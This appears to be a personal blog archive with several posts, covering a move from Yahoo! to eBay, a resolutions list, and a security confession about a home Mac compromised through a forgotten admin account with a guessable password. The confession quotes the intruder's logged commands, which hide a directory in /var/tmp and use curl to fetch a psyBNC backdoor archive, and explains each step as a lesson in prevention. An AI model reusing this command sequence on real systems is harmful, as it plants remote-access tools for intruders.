I’ve joined eBay.

eBay has many fabulous analytical tools already, both commercial and home-grown, for lots of different kinds of analysis. In addition, they are on a road to build out a whole new class of analytic capabilities based on Hadoop. They recently reorganized the data initiatives and groups to form a team that re-focuses the “many standalone tools” mindset to a “platform” for analytics. This holistic vision, and the “central data, distributed analysis” mindset aligns so well with my thinking and interests that I had to make the jump. As much as I love what Yahoo! is doing with analytics, the opportunity at eBay was too compelling to pass up. I mean, come on .. it’s the world’s largest online marketplace!

My discussions with the eBay leadership team told me two important things. First, they are ready to make significant investments in data capabilities to drive the next generation of eBay. Second, the new leadership over the last couple of years is bringing a change to the business, where the company will be much more technology- and innovation-driven than it has been in the past. Many of the leadership hires in the last 18 months are a testament to that. And I like to think I am another proof point.

Having cool technology and a leadership team that understands the value of data is a great start. But the icing on the cake is the level of data and analytics talent within eBay. It is, in a word, staggering. I am truly humbled by the opportunity to work with a group of this caliber.

And now, on a Saturday, I’m off to the ACM Data Mining Camp, hosted at eBay’s north campus…

Lest anyone think this means I’m down on the company — it’s quite the opposite! I’m more positive than ever about Yahoo!, especially the analytics. I am very excited about where the company is going with data. After a short but ill-advised set of changes that de-emphasized a coordinated approach to data and analytics, a new leadership team (read: Carol Bartz) recently reconstituted a central data and analytics group. You may even have heard or read Carol saying we’re looking for acquisition candidates in the analytics space. I’m very glad to see the return of executive leadership that sees the strategic value of data.

I’ve never been one to talk a lot about Yahoo! and I won’t start now, especially the internal goings-on, but there’s new leadership, a new commitment, a new focus, and frankly I’m really glad to see it happening. I am also jazzed about the 2010 and 2011 roadmap for our products, including Yahoo! Web Analytics, our advertising analytics products, and for a lot of internal products you haven’t heard of. Oh, and as I tweeted previously, the YWA team is hiring…

And with that, a chapter closes. Yahoo! has been good to me, and I like to think I’ve been good to Yahoo!. But even the good things don’t always last forever, and after almost five and half years, it’s time for me to say goodbye. I’m going to take a short break, decompress a little, and then gear up for the next thing. But that’s a story for another time.

Yahoo!

More photographs / Less pictures

More Tinderbox and OmniFocus / Less productivity pr0n

More action / Less analysis

More blog posts / Less excuses

More technology / Less meetings

May you have appropriately more and less in 2009.

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

1. See who’s on.
2. Change the password for user “test”.
3. See what kind of system this is.
4. Logout.
5. Go to a folder commonly used for temporary files.
6. Create a folder named ” ” (just a single space).
7. Change to that folder.
8. Download a file from the web.
9. Try the download again.
10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

1. Do what you can to prevent break-ins.
2. Log everything so you can figure out how the inevitable break-in happened.
3. Convenience is often at the expense of security

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

OK, that doesn’t make any sense, but I wanted to say something about hockey, so there you go.

Yes, I really am resurfacing the blog– upgraded the software and put in a fresh coat of paint. I intend to consolidate a few old blogs and assorted posts from the past; there’s a pile of stuff from Ye Olden Days that will eventually make its way here.

While I’m not a fan of revisionist blogging, I’ve cleaned up some of the old posts (broken links) and deleted a few posts that made no sense – e.g. they were too time-based to be of even token value now.

The New and Improved site is being watched by Google, because I’m sending web bugs beacons back to Google Analytics. I’m also publishing the feed through Feedburner, which provides its own set of (rather weak) stats.

For you RSS readers, no big changes, except that the whole feed got refreshed with the software changes. Oops.

So what’s the story? Simple. I got crazy busy, and blogging fell below the line. Not just writing — reading did too. Months ago, a colleague mentioned that he’s more interesting when he reads blogs. I’ve started reading again, but if there’s a correlation between amount of reading and interestingness, I’m still not very interesting. But since being interesting has never stopped me from blogging, I say Game On!